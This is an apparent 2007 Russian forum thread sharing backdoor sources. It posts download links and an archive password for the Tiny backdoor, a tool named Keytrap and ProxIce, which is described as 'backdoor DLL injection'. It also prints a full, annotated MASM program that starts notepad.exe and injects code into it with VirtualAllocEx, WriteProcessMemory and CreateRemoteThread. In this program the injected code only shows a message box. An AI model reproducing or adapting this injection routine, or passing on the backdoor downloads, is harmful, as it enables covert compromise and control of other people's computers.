[ASM] BackDoors' sources

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by banned, 23 Sep 2007.

    Tiny v3.2

    Download Tiny
    Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]

    [masm] fwb+ example

    Code:
    Function injection (FWB+) example by shapeless
        
        - http://swerat.com
        - http://chasenet.org
        
        thanks to ksv for the Inject-code :)
    
    ^
    
    .386
    
    .model flat, stdcall
    option casemap: none
    
    include \masm32\include\windows.inc
    include \masm32\include\kernel32.inc
    include \masm32\include\masm32.inc
    
    includelib \masm32\lib\masm32.lib
    includelib \masm32\lib\kernel32.lib
    
    ; FuncSize L1, L2 -> eax = L2 - L1
    ; Byte distance between two labels; used below to measure how many
    ; bytes of remotefunc (bracketed by Label1/Label2) must be copied.
    ; Clobbers eax and flags. Note that sub sets ZF, so ZF=1 only if the
    ; two labels coincide.
    FuncSize MACRO L1, L2
            mov eax,L2
            sub eax,L1
        ENDM
    
    ; Parameter block that is copied into the target process and handed to
    ; remotefunc as its single argument. It carries everything the remote
    ; code needs, because the copied function has no import table of its own.
    TInjData struc
        GetAddr        dword ?             ; -> GetProcAddress (filled in __ep)
        LoadLib        dword ?             ; -> LoadLibraryA   (filled in __ep)
        szUser32     byte 16 dup(0)        ; "user32.dll" (lstrcpy in __ep)
        szMsgBox     byte 32 dup(0)        ; "MessageBoxA" (lstrcpy in __ep)
    TInjData ends
    
    .data
    szApp                 db "notepad.exe",0        ; process launched by CreateProcess
    szUsr32             db "user32.dll",0           ; copied into InjData.szUser32
    szKrnl32             db "kernel32.dll",0        ; module queried with GetModuleHandle
    szMsgbox             db "MessageBoxA",0         ; copied into InjData.szMsgBox
                                                    ; (distinct symbol: option casemap:none)
    szLoadLib         db "LoadLibraryA",0           ; export name resolved from kernel32
    szGetProcAddr db "GetProcAddress",0             ; export name resolved from kernel32
    
    ; Uninitialised (zero-filled at load) storage.
    .data?
    SInfo                STARTUPINFO <>             ; zeroed again by RtlZeroMemory in __ep
    PInfo                PROCESS_INFORMATION <>     ; hProcess of the new process
    InjData            TInjData <>                  ; local copy of the parameter block
    pFunc                dword ?                    ; remote address of the copied remotefunc
    dwThreadID    dword ?                           ; out-param of CreateRemoteThread
    hKernel            dword ?                      ; local kernel32.dll base
    
    .code
    
    ; Thanks to ksv for c++ example of this code :)
    ;-----------------------------------------------------------------------
    ; Inject(hProcess, dwSize, Code) -> eax = remote address, or 0 on failure
    ; ABI:   stdcall (.model flat, stdcall); esi preserved via 'uses esi'
    ; In:    hProcess = handle to the target process
    ;        dwSize   = number of bytes to copy
    ;        Code     = local source buffer (a function body or a struct)
    ; Out:   eax = address of the copy inside hProcess; 0 if any API failed.
    ;        On every exit path ZF reflects the last '.if eax==0' compare
    ;        (the generated epilogue does not touch flags) -- the caller's
    ;        'jz EOF' depends on that.
    ; Regs:  esi = remote base returned by VirtualAllocEx
    ; Note:  RWX allocation + cross-process write into another process is
    ;        the write half of the classic remote-thread injection pattern
    ;        that endpoint monitoring hooks and alerts on.
    ;-----------------------------------------------------------------------
    Inject proc uses esi hProcess:dword,dwSize:dword,Code:dword
    LOCAL dwOldProtect:dword
    LOCAL dwWritten:dword
    
        ; reserve+commit dwSize bytes in the target, already PAGE_EXECUTE_READWRITE
        invoke VirtualAllocEx,hProcess,0,dwSize,MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
        .if eax==0
            ret                         ; allocation failed -> return 0 (MASM expands the epilogue here)
        .endif
        mov esi,eax                     ; esi = remote base address
    
        ; re-applies the same RWX protection the allocation already gave;
        ; effectively redundant, only the failure check matters
        invoke VirtualProtectEx,hProcess,esi,dwSize,PAGE_EXECUTE_READWRITE,addr dwOldProtect
        .if eax==0
            ret                         ; protect failed -> return 0 (region is leaked)
        .endif
        
        ; copy dwSize bytes from the local buffer Code into the remote region;
        ; dwWritten is never compared against dwSize
        invoke WriteProcessMemory,hProcess,esi,Code,dwSize,addr dwWritten
        .if eax==0
            ret                         ; write failed -> return 0 (region is leaked)
        .endif
        
        mov eax,esi                     ; success: return the remote address
        
        ret
    
    Inject endp
    
    
    Label1:                             ; start of the bytes copied by Inject (includes MASM's generated prologue)
    
    ;-----------------------------------------------------------------------
    ; remotefunc(iData) -- thread start routine executed inside the target
    ; process by CreateRemoteThread. Label1/Label2 bracket it so FuncSize
    ; can compute the byte length to copy.
    ; In:    iData = remote address of the TInjData copy (lpParameter)
    ; Out:   eax = return value of the final 'call eax' (MessageBoxA)
    ; Regs:  esi = iData, treated as TInjData*, preserved via 'uses esi'
    ; The body references no absolute addresses of its own: every call goes
    ; through a pointer held in TInjData and both strings live there too,
    ; so the copied bytes run unrelocated at whatever address Inject chose.
    ; Original author's pseudo-code:
    ;-----------------------------------------------------------------------
    remotefunc PROC uses esi iData:DWORD
    ; Code:
    ; invoke Loadlibrary,szUser32
    ; invoke GetProcAddres,hUser32,szMessagebox
    ; invoke Messagebox,0,0,0,0
    
        mov esi,iData
        assume esi:ptr TInjData
    
        ; eax = LoadLib(&szUser32)  -> hUser32
        lea ecx,[esi].szUser32
        push ecx
        call [esi].LoadLib
        
        ; eax = GetAddr(hUser32, &szMsgBox)  -> &MessageBoxA
        ; stdcall: lpProcName pushed first, hModule (eax) last
        lea ecx,[esi].szMsgBox
        push ecx
        push eax
        call [esi].GetAddr
        
        ; MessageBoxA(0, 0, 0, 0)
        push 0
        push 0
        push 0
        push 0
        call eax
        
        assume esi:nothing
        
        ret                             ; stdcall: pops iData; eax left as MessageBoxA's result
    remotefunc endp
    
    Label2:                             ; end of the copied bytes
    
    __ep:
    ; Program entry. Sequence: start notepad.exe, resolve LoadLibraryA and
    ; GetProcAddress from the *local* kernel32 (the code relies on those
    ; addresses being valid in the child as well), copy remotefunc and
    ; InjData into the child with Inject, then start a remote thread at
    ; the copied function with the copied struct as its argument.
    ; From a monitoring standpoint the observable chain is:
    ; CreateProcess -> VirtualAllocEx(RWX) -> WriteProcessMemory -> CreateRemoteThread.
    
    ; create new process
    ; SInfo is zeroed (cb stays 0); the CreateProcess return value is not
    ; checked, so on failure PInfo.hProcess is simply the zero from .data?
    invoke RtlZeroMemory,addr SInfo,SizeOf STARTUPINFO
    invoke CreateProcess,0,addr szApp,0,0,FALSE,0,0,0,addr SInfo,addr PInfo
    
    ; prep the structure
    ; inline strings the remote code will pass to LoadLib/GetAddr
    invoke lstrcpy,addr InjData.szUser32,addr szUsr32
    invoke lstrcpy,addr InjData.szMsgBox,addr szMsgbox
    
    invoke GetModuleHandle,addr szKrnl32
    mov hKernel,eax                     ; local kernel32 base (not checked for 0)
    
    invoke GetProcAddress,hKernel,addr szLoadLib
    mov InjData.LoadLib,eax             ; -> LoadLibraryA
    
    invoke GetProcAddress,hKernel,addr szGetProcAddr
    mov InjData.GetAddr,eax             ; -> GetProcAddress
    
    
    ; inject function
    FuncSize Label1,Label2              ; eax = byte length of remotefunc
    invoke Inject,PInfo.hProcess,eax,offset remotefunc
    jz EOF                              ; ZF here is the one left by Inject's last '.if eax==0'
    mov pFunc,eax                       ; remote address of the copied function
    
    ; inject the structure
    invoke Inject,PInfo.hProcess,sizeof TInjData,offset InjData
    jz EOF                              ; same flag dependency as above
    
    ; thread in the child: start = pFunc, parameter = eax (remote InjData);
    ; the returned thread handle is not checked or closed
    invoke CreateRemoteThread,PInfo.hProcess,0,0,pFunc,eax,0,addr dwThreadID
    
    EOF:
    
    ; exit without closing PInfo.hProcess / PInfo.hThread
    invoke ExitProcess,0
    end __ep

    KEYTRAP

    Download Keytrap
    Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]


    ProxIce 2.0 - backdoor DLL injection


    Download ProxIce
    Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]